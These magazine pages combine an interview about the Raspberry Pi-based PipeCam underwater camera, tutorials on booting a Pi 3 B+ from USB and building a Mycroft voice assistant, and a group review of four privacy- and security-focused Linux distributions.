Fred is interested in areas where the natural world and electronics meet. He's also been tinkering with machine learning and object detection, and suggests there might be some crossover with the project in the future. Follow his projects at https://hackaday.io/FredWFourie.

Sometime in 2014, Fred Fourie saw a long-term time-lapse video of corals fighting with each other for space. That piqued his interest in the study of bio-fouling, which is the accumulation of plants, algae and micro-organisms such as barnacles. Underwater documentaries such as Chasing Coral and Blue Planet II further drove his curiosity, and, inspired by the OpenROV project, Fred decided to build an affordable camera rig using inexpensive and easily sourceable components. This he later dubbed PipeCam; head to the project's page (https://hackaday.io/project/21222-pipecam-low-cost-underwater-camera) to read detailed build logs and view the results of underwater tests.

Are power and storage two of the most crucial elements for remote builds such as the PipeCam?
It has been a bit of an ongoing challenge. Initially, I wanted to solve my power issues by making the PipeCam a tethered system, but difficulties in getting a cable into the watertight hull made me turn to a self-contained, battery-powered unit. In the first iterations, I had a small rechargeable lead-acid battery and a Raspberry Pi 3, but the current version sports a Pi Zero with a Li-ion power bank. This gives me more than five times the power capacity for a reasonable price. With regards to storage space, I've opted for a small bare-bones USB hub to extend the space with flash drives. There are a few nice Raspberry Pi Zero HATs for this.

What was the most challenging part of the project?
Definitely the underwater housing: I had many leaks. The electronics are all off-the-shelf and the online communities have made finding references for the software that I wrote a breeze, but without a good underwater housing the project is… well, literally dead in the water. As of the start of the year I got a friend onboard, Dylan Thomson, to help me with the mechanical parts of the project. Dylan has a workshop with equipment to pressure-test housings (and my calculations). This freed me up to work on the software and electronics.

Talking of software, what is the PipeCam running?
I use Raspbian Lite as my base OS. I load up apache2 by default on most projects so I can host 'quick look' diagnostic pages as I tinker. On the PipeCam I installed i2c-tools to set up my hardware clock to keep track of time on longer deployments. I set up my USB drives to be auto-mounted to a specific location. For this I use blkid to get the drive information, and then add the drives to the system by editing /etc/fstab with the drive details and desired location. The main script is written in Python, as it's my home language. The script checks which drive has enough space to record, and depending on the selected mode (video or photo) it then starts the recording or photo-taking process. The script outputs some basic info which I log from the cron call, which is where I set up my recording interval. It's not complicated stuff.

Any particular reason for using the Raspberry Pi?
I know my way around a Linux system far better than I know microcontrollers. The familiarity of the Pi environment made quick setup and experimentation possible. Also, the community support is excellent.

How do you plan to extend the project?
So far the results have been pretty promising. Ultimately the next iteration will aim to increase user-friendliness and endurance. To achieve this there are three sets of modifications I aim to add:
• Make use of the Pi's GPIO to add settings buttons
• Host a user interface webpage on the Pi itself, for system health checks
• Integrate some battery monitoring with use of current- and voltage-sensing circuits, with a light-dependent resistor (LDR) to determine if there's enough light to take a picture.

Could you explain the Fritzing schematic you've shared on the project page?
The next iteration is all about reducing the power used in idle times. In the circuit you can see that the main power to the Raspberry Pi is controlled via a relay from an Arduino Nano. The Nano takes inputs from a current sensor, voltage sensor and LDR, and decides from these inputs whether the Pi should be switched on. In addition to the RTC on the Pi, you'll also see a BME280 breakout board to monitor pressure, temperature and humidity, to detect changes associated with leaks. There's also a slide switch to select video or photo mode.
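The drive-selection step Fred describes can be sketched in a few lines of Python. This is a hedged illustration only – the function names and the free-space threshold are our own inventions, not taken from his code:

```python
import os

MIN_FREE = 100 * 1024 * 1024  # illustrative threshold: ~100MB needed to record

def free_bytes(path):
    # statvfs reports the filesystem's free blocks and fragment size
    st = os.statvfs(path)
    return st.f_bavail * st.f_frsize

def pick_drive(mount_points):
    """Return the mount with the most free space, or None if all are too full."""
    usable = [m for m in mount_points if free_bytes(m) >= MIN_FREE]
    return max(usable, key=free_bytes) if usable else None
```

A cron entry would then call the full script at the desired recording interval and log its output, much as Fred outlines above.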

Floating brain
Fred first used a Pi 3 and Waterproof chassis
then a Pi 2 before switching The PVC pipe and the end
to the Pi Zero to reduce caps protect the electronics
power consumption. A cron from the elements. The leak-
job on the Pi calls a Python proof housing has a 10mm
script to check available Perspex lens that withstands
space on the attached USB four bars of pressure.
drives, and if all’s okay,
it then snaps a picture or
records a video.

Fuel
The system currently has no real power
management, which Fred admits is a
shortcoming that he hopes to remedy
soon using an Arduino Nano. For the
time being, the current configuration
allows for a second power bank.
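Fred hasn't published firmware for the planned Arduino Nano controller, but the decision logic he describes – battery voltage and an LDR reading deciding whether the relay powers the Pi – boils down to something like this Python sketch. The thresholds are invented for illustration:

```python
# Invented thresholds – these would be tuned against the real sensors
MIN_BATTERY_V = 3.3   # below this, keep the Pi powered off
MIN_LIGHT = 200       # LDR reading needed for a usable picture

def should_power_pi(battery_volts, light_level):
    """Close the relay only when there's enough charge and enough light."""
    return battery_volts >= MIN_BATTERY_V and light_level >= MIN_LIGHT
```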

Components list
• Raspberry Pi Zero
• Raspberry Pi Camera Module v2
• USB Hub pHAT
• SanDisk Cruzer Blade USB flash drives
• Power bank
• On/off toggle switch
• 10mm Plexiglass/Perspex lens
• 110mm PVC waste pipe
• 110mm PVC screw-on end cap
• 110mm PVC stop-end

Data loggers
SanDisk Cruzer Blade USB drives plug into the four-port USB pHAT. statvfs finds the drive with the most free space every time the cron job calls on the script.

I spy
The Raspberry Pi camera module has been giving good results and surprised Fred with its underwater performance. However, the module, with its fiddly ribbon, isn't very robust and he fried one during his tests.

1 Helping hand
While he started the project alone, Fred asked his friend Dylan to join in earlier this year. Dylan handles the mechanical aspect of the project and is in charge of building the robust leak-proof housing, while Fred focuses on software and electronics.

2 A new house
The latest iteration of PipeCam – v1.5 – uses a flashy transparent housing with a Raspberry Pi sticker. The internal mounting has also been changed so that the on/off switch and recharge port are accessible by simply removing the lens.

3 There's more to come
Now that he has finalised the design of the build, the next goal is to test the build as much as possible and tweak and refine settings. Fred also intends to give a PipeCam to a few scientists to test in their own fields (or rather water) later this year.

Tutorial Pi 3 B+: USB Booting

Boot your Pi 3 B+ from USB


Configure and boot up your Raspberry Pi 3 B+
using a USB flash or hard drive
Dan Aldred
Dan is a Raspberry Pi enthusiast, teacher and coder who enjoys creating new projects and hacks to inspire others to start learning. Currently hacking an old rotary telephone.

Resources
Raspberry Pi 3 B+
microSD card
USB storage device

On 14 March 2018 – often referred to as Pi Day, because the date written in US format is 3.14 – the Raspberry Pi Model 3 B+ was released. Among the upgrades were a new 1.4GHz, 64-bit, quad-core ARM processor, dual-band 802.11ac wireless LAN, and Bluetooth 4.2. Faster Ethernet was added in the form of gigabit Ethernet over USB 2.0, and there's also improved thermal management. Additional improvements have also been made to booting from a USB mass-storage device, such as a flash drive or hard drive.

This tutorial explains how to take such a device and boot up your Raspberry Pi 3 B+ using it. Once everything's configured, there's no longer any need to use an SD card – it can be removed and used in another Raspberry Pi. The benefits of this are that you can increase the overall storage size of the Pi from a standard 4GB-8GB to upwards of 500GB. A further benefit is that the robustness and reliability of a USB storage device is far greater than an SD card, so this increases the longevity of your data.

Before you begin, please note that this setup is still experimental and is developing all the time. Bear in mind too that it doesn't work with all USB mass-storage devices; you can learn more about why and view compatible devices at www.raspberrypi.org/blog/pi-3-booting-part-i-usb-mass-storage-boot.

02 Download the latest OS image
You'll obviously need to install the latest version of the OS to make use of this feature, so first open your web browser and head to www.raspberrypi.org/downloads. Select the current Raspbian option and download the 'Stretch with Desktop' image. You can click the link for Release Notes to see all the updates and changes made to the OS with that version. Remember that the file is zipped, so you need to extract the IMG from the folder. Open it and drag the file onto your desktop or another folder.

03 Write the OS to the SD card
Now, write the .img image to the SD card. An easy method to do this is with Etcher, which can be downloaded from https://etcher.io. Insert your SD card into your computer and wait for it to load. Open Etcher and click the first 'image' button, select the location of the .img file, then click the 'select drive' button and select the drive letter which corresponds to the SD card. Finally, click the 'Flash!' button to write the image to the card.

04 Write the OS to the USB device
We now need to write the same Raspbian OS image to your USB storage device. You can use the same .img image that you downloaded in step two. Ensure that you have ejected the SD card and load Etcher. Attach the USB storage and once loaded, select the relevant drive from the Etcher menu. Drag the .img image file across as you did in step three. While that's writing, place the SD card into your Raspberry Pi and boot it up ready for the next step.

01 How it works
This setup involves booting the Raspberry Pi
from the SD card and then altering the config.txt file
in order to set the option to enable USB boot mode. This
in turn changes a setting in the One Time Programmable
(OTP) memory in the Raspberry Pi’s system-on-a-chip,
and enables booting from a USB device. Once set you can
remove the SD card for good. Please note that any
changes you make to the OTP are permanent, so ensure
that you use a suitable Raspberry Pi – for example, one
that you know will always be able to be hooked up to the
USB drive rather than one you might take on the road.

05 What's new
With the release of the new Raspberry Pi 3 B+ the operating system was also updated. This features an upgraded version of Thonny, the Python editor, as well as PepperFlash player and Pygame Zero version 1.2. There's also extended support for larger screens. To use that, from the main menu select the Raspberry Pi configuration option. Navigate to the System tab and locate the 'Pixel Doubling' option. This option draws every pixel on the desktop as a 2x2 block of pixels, which makes everything twice the size. This setting works well with larger screens and HiDPI displays.

06 Configure the Wi-Fi
With the latest OS update, Wi-Fi is disabled until the 'regulatory domain' is set. This basically means that you have to specify your location (in terms of country) before your Wi-Fi becomes available. Open the main menu and scroll to Raspberry Pi Configuration settings, then select the 'Localisation' tab and then 'Set WiFi Country'. Scroll down the list and select the relevant country for your current location.

07 Configure the USB boot mode
In order to boot your Raspberry Pi from the USB device, you need to alter the config.txt file to stipulate that future boots happen from the USB. Open the Terminal window and type echo program_usb_boot_mode=1 | sudo tee -a /boot/config.txt. This adds the line program_usb_boot_mode=1 to the end of /boot/config.txt. This sets the OTP (One Time Programmable) memory in the Raspberry Pi's SoC to enable booting from the USB device. Remember that this change you make to the OTP is permanent and can't be undone.

08 Check the configuration
Once you've edited the config file, type sudo reboot to reboot your Raspberry Pi. The next step is to check that the OTP has been programmed correctly. Open the Terminal window, enter vcgencmd otp_dump | grep 17 and then press Enter. If the OTP has been programmed successfully, 17:3020000a will be displayed in the Terminal. If it's any different, return to step 7 and re-enter the line of code.

09 Boot from the USB storage device
This completes the configuration of the OTP. Shut down your Raspberry Pi and remove the SD card, which is no longer needed. Take the USB device you prepared in step 4 and insert it into one of the USB ports. Add the power supply and after a few seconds your Raspberry Pi will begin booting up. If you have a display connected you'll see the familiar rainbow splash screen appear. Note that the boot-up time may be slower than using an SD card – this depends on the type and speed of the USB drive you're using. However, once the Pi has completed booting up it will run at the usual speed.

10 Reusing the SD card
At some point in the future you will probably want to reuse the SD card that was used to set up the USB device. To do this you simply need to remove the program_usb_boot_mode=1 line from config.txt so that the Raspberry Pi boots from the SD card. Since you can't now use this SD card to boot up the Pi you've just altered, you'll first need to insert the card into your main PC – don't use it yet with a different Pi if you have one, as when that one boots up, it too will be set to start from USB! Open the Terminal window and then open the config.txt file: sudo nano /boot/config.txt. Scroll down and locate the line of text program_usb_boot_mode=1 and either delete it or comment it out. You can now use this SD card in another Raspberry Pi.

The PoE HAT
The official Raspberry Pi PoE (Power over Ethernet) HAT is also now available. This new add-on board is designed for the 3 B+ model and enables the Raspberry Pi to be powered via a power-enabled Ethernet network. It features 802.3af PoE, a fully isolated switched-mode power supply accepting 37–57V DC, plus a 25mm x 25mm brushless fan for processor cooling, with fan control. Could this signal a move towards the Raspberry Pi being embedded in more IoT devices? You can purchase the PoE HAT from https://www.raspberrypi.org/products/poe-hat – at the time of writing, the price was to be determined.
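The OTP check in step 8 is easy to script if you want your Pi to verify itself. Here's a minimal Python sketch that wraps the vcgencmd call – the helper functions are our own; only the expected register value 17:3020000a comes from the step above:

```python
import subprocess

EXPECTED = "17:3020000a"  # OTP register 17 once USB boot mode has been set

def usb_boot_enabled(otp_line):
    """True if a `vcgencmd otp_dump` line shows the USB boot bit programmed."""
    return otp_line.strip() == EXPECTED

def check_pi():
    # Equivalent of: vcgencmd otp_dump | grep ^17:
    out = subprocess.run(["vcgencmd", "otp_dump"],
                         capture_output=True, text=True).stdout
    line17 = next(l for l in out.splitlines() if l.startswith("17:"))
    return usb_boot_enabled(line17)
```

Run check_pi() on the Pi itself; it returns True only when the boot mode has stuck.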

Tutorial Mycroft: DIY voice assistant

Make an open source voice assistant with Mycroft
Forget Cortana, Alexa, Google Home and Siri – we're going open source and creating our own voice assistant

Calvin Robinson
Calvin is Director of Computing & IT Strategy at an all-through school in northwest London.

Resources
Mycroft
https://mycroft.ai/get-mycroft

Raspberry Pi 3

microSD card,
8GB or larger

USB microphone

Speakers

Etcher
https://etcher.io
Above Mycroft Mark II, expected in December this year, looks like being an impressive piece of hardware

Voice assistants are all the rage at the moment, what


with Microsoft’s Cortana, Apple’s Siri, Google’s Home
and Amazon’s Alexa all entering the market. Users
are becoming more comfortable talking to a device and
receiving audible instructions, in a way that’s not too
dissimilar from the computer in the Star Trek franchise.
However, with current concerns regarding privacy, it’s
important to know what data is collected, where it’s
going, and who could potentially be eavesdropping on
your conversations.
We don’t mean to sound paranoid, but if you’ve got
an open mic in your environment it’s pretty important
to know where any data might be heading; some of the
larger corporations collect information about users to
better target advertisements towards them. That's why users are turning to open source alternatives. Last issue we interviewed John Montgomery, the CEO of Mycroft AI, who has set out to address this problem. This issue we're having a go at building one of these units for ourselves, armed only with a Raspberry Pi, a USB microphone and some speakers.

01 Download and flash
There are Linux (Arch, Fedora and Ubuntu/Debian) and Android versions of Mycroft available, but for this tutorial we're sticking with the Raspberry Pi flavour. We recommend you use a Pi 3.
Download the latest version of Picroft from the link in our Resources section, as well as Etcher. Other than any potential 'Skills' you want to add later on, that should be all you need to download for this tutorial. Etcher is an imaging program which we'll use to burn or flash the downloaded Picroft image to an SD card. Plug your microSD card into your computer, launch Etcher and select the Picroft image. Then flash it!

02 Set it up
Plug your microSD card back into your Raspberry Pi and connect it to a power source. The easiest way to get everything working is to connect your Pi to the local network via the Ethernet port. If you do need to use Wi-Fi, look out for an SSID called MYCROFT; the default password is 12345678.
Once everything is connected, you'll want to either plug in a monitor and keyboard, or connect via SSH to do this headlessly. Whether via Ethernet or Wi-Fi, once your device is connected you'll need to visit http://home.mycroft.ai to start the setup process. You'll need to sign in with Google, Facebook or GitHub, or create a new Mycroft account; given that part of the reason for this project is to protect your data from being shared with big corporations, the latter might be advisable!

03 Find your Raspberry Pi
To date, all Raspberry Pi devices start with a MAC address of B8:27:EB, so we can use this to scan our network for the Pi if we don't have a monitor/keyboard to connect to it. You could use nmap, for example:

sudo nmap -sP 192.168.1.0/24 | awk '/^Nmap/{ip=$NF}/B8:27:EB/{print ip}'

You can also use arp:

$ arp -na | grep -i b8:27:eb

If your home network is not on the 192.168.1.* subnet, change the command line accordingly.

04 Connect to Picroft
SSH into your Picroft and you'll be taken straight into the Mycroft CLI screen. Usually this is quite useful, but while we get things set up we want to exit that screen using Ctrl+C to reach a normal command prompt. Here you'll want to do some basic setting-up. First, change the password: type passwd and follow the prompts. Then change the Wi-Fi network settings:

sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

Change the network name and/or password in this config file, then press Ctrl+X to exit and save the file. Then type sudo reboot to reload your Picroft.

05 Add your device to Mycroft.ai
Back in your browser at home.mycroft.ai, click 'Add Device' and you'll be asked for a name and location for your Picroft device. You'll also be asked for a registration code; if you turn on the speakers connected to your device you'll notice the Picroft is reading this out to you already, until the device is paired up.
Now that we've paired with Mycroft.ai, we can go to the Settings menu where you can select a male or female voice, the style of measurement units you want to use, and your preferred time/date formats.
If you're concerned about privacy, you may want to keep the Open Dataset box unticked. Keep in mind, though, that selecting this option is a good way of contributing useful data to the open source project and thus improving the performance of Mycroft in the future, assuming your voice assistant isn't in a particularly confidential environment.

06 Advanced settings
In Advanced Settings, we can really begin to personalise our Mycroft experience. There are a number of pre-programmed wake words, but you can set your own custom version – perhaps 'Computer' a la Star Trek, or maybe 'Butler' if you're feeling particularly bourgeois. You'll need to set the phonetic version of your wake word too, so the device understands what it's listening out for. An example would be 'HH EY . B AH T L ER .' for "Hey Butler". You'll probably want to include some kind of exclamation or greeting before your wake word to avoid confusing the Picroft. This is almost certainly why "Hey Google" or "Okay Google" are used on Google Home, rather than just "Google"; it's to avoid said devices picking up on random conversations, something which happened quite a lot in our testing.
You can also switch the text-to-speech engine from Mycroft's Mimic engine to Google's own. This will change the voice you hear to that of Google Home, which is arguably much smoother.

07 Using the Picroft CLI
Now that everything is set up, you should have a basic voice assistant raring to go. Call out the wake word and issue a few commands to get started – Mycroft understands all these examples by default:
Hey Butler, what time is it?

Hey Butler, set an alarm for X am.
Hey Butler, record this.
Hey Butler, what is [insert search term].
Hey Butler, tell me a joke.
Hey Butler, go to sleep.
Hey Butler, read the news.
Hey Butler, set a reminder.
Hey Butler, do I have any reminders?
Hey Butler, increase/decrease volume.
Hey Butler, what's the weather like?

You can also skip our earlier step of using nmap or arp by asking "Hey Butler, what is my IP address?".

Mycroft, send help
There's an active community on GitHub ready to help with requests, which will come in handy as Picroft spits out quite a few Python 2.7 errors when Skills refuse to load properly…

08 Adding Skills
Of course, the default abilities are all well and good, but surely where an open source program comes into its own is with customisation. Mycroft/Picroft is no different in this regard, with a whole range of different voice abilities available. These seem to have been coined 'Skills' – we can thank Amazon for that.
Back at Mycroft.ai, it's time to explore the Skills menu. There's an option to paste a GitHub URL to install a Skill, which is quite useful, but Mycroft does also recognise "install [name of Skill]" as a command. You'll see a link to a list of community-developed Skills, where you can also find the names and commands needed to install them. "install YouTube" adds a simple YouTube streaming Skill, for example.

09 Play music
The only officially supported music-playing app seems to be mopidy, which we had great difficulty in getting working. Hours of fiddling with dependencies and an extended deadline later, we still had no luck. However, we did find spotify-skill in the GitHub repository, which works a treat.
Simply by copying the GitHub URL (https://github.com/forslund/spotify-skill) into the 'Skill URL' box on Mycroft.ai and ticking 'Automatic Install', moments later we had a new menu option to input our Spotify details. Then "Hey Mycroft, play Spotify" loads up our most recent playlist. The only problem was that we couldn't figure out a way to stream directly to the Mycroft; spotify-skill only streams music to another Spotify Connect device. It's only speculation on our part, but we assume this is something to do with licensing restrictions for 'official' Spotify devices.

10 Play podcasts and radio
Thankfully, it's much easier to stream podcasts than it is music. A quick "install podcast skill" installs the necessary Skill, and you'll then have options on Mycroft.ai for your three favourite podcast feeds. Paste in the RSS details and you're good to go. "Hey Mycroft, play x podcast" should then do the trick.
We didn't have as much luck with the Internet Radio Skill, though. Requesting any internet radio stations threw up PHP errors, which are visible in the Picroft command-line interface and log viewer. It seems as if Skills are very hit-and-miss at the moment. There is a 'status' column for each one on the community page which is meant to indicate its readiness, but we found the results to be inconsistent.
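Step 3's MAC-based discovery can also be scripted rather than grepped by hand. Here's a hedged Python sketch that filters `arp -na` output for the Pi's B8:27:EB prefix – the regex assumes the typical Linux arp output format, and the function name is our own:

```python
import re

PI_PREFIX = "b8:27:eb"  # MAC prefix used by Raspberry Pi boards to date

def pi_addresses(arp_output):
    """Return the IP of every Raspberry Pi seen in `arp -na` output."""
    hits = []
    for line in arp_output.lower().splitlines():
        # Typical line: "? (192.168.1.23) at b8:27:eb:12:34:56 [ether] on eth0"
        m = re.search(r"\((\d{1,3}(?:\.\d{1,3}){3})\) at ([0-9a-f:]{17})", line)
        if m and m.group(2).startswith(PI_PREFIX):
            hits.append(m.group(1))
    return hits
```

Feed it the output of `arp -na` (via subprocess or a pipe) and it returns only the Pi entries.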

11 Replacing commercial voice assistants
While the Picroft has been a fun experiment to
sink (way too many) hours into, do we think it’s ready for
prime time? In a word: no. While the core experience may
be fine, it’s extremely limited and the Skills are not yet up
to scratch. In our experience, they’re just not very likely to
work, even after hours of fiddling.
If you’re looking for a new hobby and don’t mind putting
a few days into this, you’ll get some enjoyment out of it.
However, if you’re looking for a new voice assistant to
read you the news, wake you up and play your favourite
music or radio station, we’re still forced to recommend
one of the commercial units. Having said that, Mycroft
Mark II is available to reserve on Indiegogo right now too.

12 Testing
It may be that Mycroft's voice recognition isn't up to scratch, or it may be that the microphone we used for testing was cheap and useless, but constantly issuing commands via voice during the testing process proved to be tiring. Fortunately, Mycroft supports text-based commands, too.
If you SSH into your Picroft you can type text commands directly into the command-line interface. If you exit out of the CLI, there are a number of command prompts available:
mycroft-cli-client A command-line client, useful for debugging
msm Mycroft Skills Manager, to install new Skills
say_to_mycroft Use one-shot commands via the command line
speak Say something to the user
test_microphone Record a sample and then play it back to test your microphone

Other versions of Mycroft
At the moment Mycroft is available in several flavours. The version we're looking at here, technically known as Picroft, consists of the free software only – you'll need to add your own Raspberry Pi to run it, plus speakers and a mic. If you prefer an off-the-shelf version, you can opt for the Mycroft Mark I ($180), a standalone hardware device which is equally 'hackable' in terms of adding abilities or changing code. Finally, there's Mycroft for Linux, which you need to install using either a shell script or a standalone installer. Mycroft AI describes this as "strictly for geeks".

Above Mycroft Mark I comes with speakers and mic built-in

13 Becoming a supporter
Mycroft offers an optional subscription service, at $1.99 per month or $19.99 for a year. While the primary purpose of these subscriptions is to support the development team, there are exclusive updates which are made available only to subscribers.
As of May 2017 there's a new female voice available only to supporters. There was also a Group Hangout session with John Montgomery himself in April. The mission statement reads:
"It's hard to overstate how much I value your support Calvin Robinson. It allows my team to make me grow, and become better, faster, stronger. Your contribution takes us all closer to the ultimate goal of creating a general purpose artificial intelligence, which is open for everyone."

14 So, is it worth it?
There are lots of pros and cons to a setup like this. There's the freedom of being able to create your own Skills, or to find them in the brilliant online community. There are the benefits of being able to jump into the code and have a play-around, or just to check that your data really isn't going anywhere. But you have to balance that against the inability to find a working Skill when, for example, you just want to stream some music. When we did manage to get a stream working, Mycroft would talk all over the audio stream, with false positives of the wake word being picked up.
If you're a hobbyist looking for a new project to sink your teeth into, Mycroft might be right up your street. If you just want a device that you can say "Play the Beatles" to, without getting out of bed, this might not be the right setup for you right now. That's not to say it won't ever be, with the community and Skills growing at a rapid pace – and with the very promising Mark II version on the way, who's to say what Mycroft might be in a year's time? At the moment, though, it's lacking commercial viability.

81 Group test | 86 Hardware | 88 Distro | 90 Free software

Kodachi Linux Qubes OS

Subgraph OS Whonix

Group test

Security distributions
Use one of these specialised builds that go one step further than
your favourite distribution’s security policies and mechanisms

Kodachi Linux
This Debian-based project aims to equip users with a secure, anti-forensic and anonymous distribution. It uses a customised Xfce desktop in order to be resource-efficient and claims to give users access to a wide variety of security and privacy tools while still being intuitive.
www.digi77.com/linux-kodachi

Qubes OS
Endorsed by Edward Snowden, Qubes enables you to compartmentalise different aspects of your digital life into securely isolated compartments. The project makes intelligent use of virtualisation to ensure that malicious software is restricted to the compromised environment.
www.qubes-os.org

Subgraph OS
This is another distribution on Snowden's watchlist. Subgraph is a relatively new project that works its magic by building sandbox containers around potentially risky apps such as web browsers. Despite its stability its developers are calling it an alpha release.
https://subgraph.com

Whonix
This Debian-based distribution is unlike any of its peers that install and run atop physical hardware. Whonix is available as a couple of virtual machines that can run over KVM, VirtualBox and even Qubes OS. This unique arrangement of virtual machines also helps ensure your privacy.
www.whonix.org

Review Security distributions

Kodachi Linux
A reasonably secure distribution – easy to use but difficult to install

Kodachi enables you to use your own VPN instead of Kodachi's, and will ban users who misuse their VPN for things such as hosting illegal torrents

How is it secure?
Unlike some of the other distros, Kodachi doesn't use a hardened kernel. However, the kernel is patched against several denial-of-service and information-leak vulnerabilities, and also the major privilege-escalation vulnerability Dirty COW. It also includes Firejail to run common applications inside sandboxed environments.

What about anonymity?
Kodachi routes all connections to the internet through a VPN before passing them to the Tor network. It also bundles a collection of tools to easily change identifying information such as the Tor exit country. Additionally, the distribution encrypts the connection to the DNS resolver and includes well-known cryptographic and privacy tools to encrypt offline files, emails and instant messaging.

Useful as a desktop?
The distro is loaded to the brim with apps that cater to all kinds of users. Kodachi includes all the apps you'll find on a regular desktop distribution and then some. Its hefty 2.2GB Live image includes VLC, Audacity, LibreOffice, VirtualBox, KeepassX, VeraCrypt and more. There's also the Synaptic package manager for additional apps.

Installation and setup
This isn't one of the distribution's strong suits. Kodachi uses the Refracta installer to help anchor the distro. However, the installer is very rudimentary; for instance, it uses GParted for partitioning the disk. You also can't change the default username, because then many of the custom scripts won't function post-installation – not something we'd expect to see.

Overall: 8
Kodachi uses Firejail to sandbox apps and isn't very easy to install. But its collection of privacy-centred tools and utilities that help you remain anonymous when online is unparalleled.

Qubes OS
Ensures maximum security and privacy, but at the price of usability

Qubes OS has an easy-to-follow installer, but it is a complicated distro and you need to learn the ropes. (See LU&D189 p60 for a detailed guide.)

How is it secure?
Qubes divides the computer into a series of virtual domains called qubes. Apps are restricted within their own qubes, so you run Firefox in one to visit untrusted websites and another instance of the browser in a different qube for online banking. A malware-ridden website in the untrusted qube will not affect the banking session.

What about anonymity?
Qubes is geared more towards security than privacy and anonymity, and therefore doesn't include any specific software or integrated processes to hide your identity. In fact, if you care about privacy as well as security, Qubes' developers suggest running Whonix on top of a Qubes installation to get the best of both worlds – though obviously performance will suffer.

Useful as a desktop?
Qubes functions pretty much like any Fedora-based distribution, but you'll need to familiarise yourself with its peculiarities. For example, you can add additional apps with dnf or a graphical app, but you'll need to make sure you do this within a TemplateVM. If you aren't careful you'll end up negating Qubes' security advantages.

Installation and setup
Qubes is available as an install-only medium. The project developers don't recommend installation on a dual-boot computer, nor inside a virtual machine such as VirtualBox. It uses a customised Anaconda installer which is a breeze to navigate. However, if your graphics hardware isn't detected the installer falls back to the command-line installer, which has a well-known bug that prevents installation.

Overall: 7
Qubes compartmentalises the entire Linux installation into Xen-powered virtual domains. This arrangement ensures that a compromised app doesn't bring down the entire installation.

82
Subgraph OS
Manages to successfully tread the line between usability and security

n You can use the intuitive Subgraph Firewall to monitor and filter outgoing connections from individual apps

How is it secure?
Subgraph ships with a kernel hardened with the PaX set of patches from the Grsecurity project, which make both the kernel and the userland less exploitable. The distribution also forces users to encrypt their filesystem. To top it off, Subgraph runs many desktop applications inside the Oz security sandbox to limit the risks.

What about anonymity?
The distro anonymises all your internet traffic by routing it via the Tor network. It also uses the anonymous, peer-to-peer file-sharing application OnionShare. Then there's Subgraph Firewall, which applies filtering policies to outgoing connections on a per-application basis and is useful for monitoring unexpected connections from applications.

Useful as a desktop?
Subgraph includes a handful of mainstream apps for daily desktop use, such as LibreOffice and VLC. On Subgraph these come wrapped by the sandboxing system Oz for added privacy protection. The distribution is also configured to fetch packages from its own custom repository and that of Debian Stretch.

Installation and setup
Subgraph uses a modified Debian installer to help you set up encrypted LVM volumes during installation. The distribution establishes a connection to the Tor network as soon as it's connected to the internet – but it doesn't include the Tor browser by default; this is automatically downloaded when launched for the first time.

Overall
8 – Subgraph goes to great lengths to ensure everything from the kernel to the userland utilities isn't exploitable. It also bundles a host of privacy-centred apps along with mainstream desktop apps.

Whonix
A ready-to-use OS that's available as two KDE-powered virtual machines

n The iptables rules on the Whonix-Workstation force it to only connect to the virtual internet LAN and redirect all traffic to the Whonix-Gateway

How is it secure?
Built on the concept of security by isolation, Whonix comes in the form of two virtual machines. The idea behind this is to isolate the environment you work in from the internet access point. On top of this, Whonix routes all internet traffic through Tor. Thanks to this, even if one of the machines is compromised, it wouldn't affect the other.

What about anonymity?
Whonix uses Tor to hide your IP address and circumvent censorship. The distribution also bundles the anonymous peer-to-peer instant messenger Ricochet and the privacy-friendly email client combo of Thunderbird and TorBirdy. Whonix doesn't include the Tor Browser by default, but there's a script to download a version from a list of stable, new and hardened releases.

Useful as a desktop?
Whonix doesn't include LibreOffice but does have VLC. There's also KGpg for managing keys, and many of its applications are tuned for privacy. The distro has a bunch of repos and you'll have to choose one while setting it up. It doesn't include a graphical package manager, but you can use the WhonixCheck script to search for updates.

Installation and setup
There's no installation mechanism for Whonix. Instead, the project's website offers several deployment mechanisms, the most convenient of which is to grab the VMs that work with VirtualBox. At first launch, both VMs take you through a brief setup wizard to familiarise you with the project and to set up some components, such as the repository.

Overall
8 – Whonix is a desktop distro that's available as two separate VMs. It ensures security and privacy by using a virtualisation app to isolate the work environment from the one that faces the internet.
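The caption's point about the Whonix-Workstation firewall can be sketched in iptables-restore form. This is an illustrative fragment of the general technique (redirect outbound TCP to the gateway's Tor transparent proxy and drop everything else), not a copy of Whonix's actual ruleset; the 10.152.152.10 address and port 9040 reflect Whonix's documented defaults but should be treated as assumptions here.

```
# Illustrative iptables-restore fragment for a Whonix-style workstation
*nat
:OUTPUT ACCEPT [0:0]
# Redirect all outbound TCP to the Tor TransPort on the gateway
-A OUTPUT -p tcp -j DNAT --to-destination 10.152.152.10:9040
COMMIT
*filter
:OUTPUT DROP [0:0]
# Only traffic towards the internal gateway is allowed out
-A OUTPUT -d 10.152.152.10 -j ACCEPT
COMMIT
```

The effect is that the workstation physically cannot reach anything except the gateway, so a compromised app still has no direct route to the internet.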

www.linuxuser.co.uk 83
Review Security distributions

In brief: compare and contrast our verdicts


How is it secure?
Kodachi Linux: Uses a patched kernel instead of a hardened one and sandboxes apps with Firejail. 8
Qubes OS: Uses Xen to divide the desktop and apps into virtual 'qubes' that are isolated from each other. 9
Subgraph OS: Includes a hardened kernel and runs many common apps inside a security sandbox. 9
Whonix: Isolates the internet gateway from the workstation in which you run your apps. 8

What about anonymity?
Kodachi Linux: Routes all connections to the internet first via a VPN and then through the Tor network. 9
Qubes OS: Its architecture ensures a certain level of privacy, but that's not intended to be its forte. 5
Subgraph OS: Routes all traffic through Tor and comes bundled with a host of privacy-centred apps. 9
Whonix: Routes all traffic via Tor and includes a good many useful privacy apps and utilities. 8

Useful as a desktop?
Kodachi Linux: The Xfce desktop is loaded with marquee open source apps for all kinds of users. 9
Qubes OS: It operates like any other Fedora installation, so long as you adhere to its specific nuances. 6
Subgraph OS: Bundles a few mainstream apps but can be fleshed out via its own and Debian's repos. 8
Whonix: Its KDE desktop is limited and you'll need to add extra apps from the command line. 7

Installation and setup
Kodachi Linux: Uses the rudimentary Refracta installer, which is Kodachi's weakest aspect. 5
Qubes OS: Install-only distribution that uses a modified but easy-to-operate Anaconda installer. 8
Subgraph OS: Uses a modified Debian installer and doesn't require much setting up before use. 8
Whonix: Ships as two VMs that you simply import into an app such as VirtualBox and boot. 9

Overall
Kodachi Linux: Uses Firejail to secure its collection of apps but is cumbersome to install. 8
Qubes OS: Ensures compromised applications don't make the entire distro installation vulnerable. 7
Subgraph OS: Provides a secure environment with a collection of apps to safeguard your privacy. 8
